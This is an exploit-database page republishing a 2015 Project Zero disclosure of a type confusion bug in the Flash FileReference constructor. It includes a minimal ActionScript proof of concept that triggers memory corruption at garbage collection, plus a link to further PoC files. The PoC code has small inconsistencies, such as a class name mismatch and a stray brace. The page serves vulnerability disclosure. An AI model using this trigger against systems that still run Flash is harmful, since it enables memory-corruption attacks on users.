header-logo
Suggest Exploit
vendor:
FileReference Constructor
by:
Project Zero
7,5
CVSS
HIGH
Type Confusion
843
CWE
Product Name: FileReference Constructor
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2015

Type Confusion in FileReference Constructor

There is a type confusion issue in the FileReference constructor. The constructor adds several properties to the constructed object before setting the type and data. If a watch is set on one of these properties, code can be called and the object can be initialized to one with a destructor before the FileReference constructor sets the object data, leading to type confusion when the object is garbage collected.

Mitigation:

Ensure that the FileReference constructor is not vulnerable to type confusion.
Source

Exploit-DB raw data:

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=799

There is a type confusion issue in the FileReference constructor. The constructor adds several properties to the constructed object before setting the type and data. If a watch is set on one of these properties, code can be called and the object can be initialized to one with a destructor before the FileReference constructor sets the object data, leading to type confusion when the object is garbage collected.

A minimal PoC is as follows:

function myfunc(){
			
			this.__proto__ = {};
			this.__proto__.__constructor__ = flash.display.BitmapData;
			super(1000, 1000);
			
			
			}
			

	function mysubclass(){
		

		this.watch("name", myfunc);
		_global.ASnative(2204, 200)(this); // FileReference constructor
		this.unwatch("name"); // let the reference free
		
		}
	}

        var a = new subclass();
        a = 0;
        // wait for GC


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39829.zip

Navigation

Suggest Exploit

Services By CQR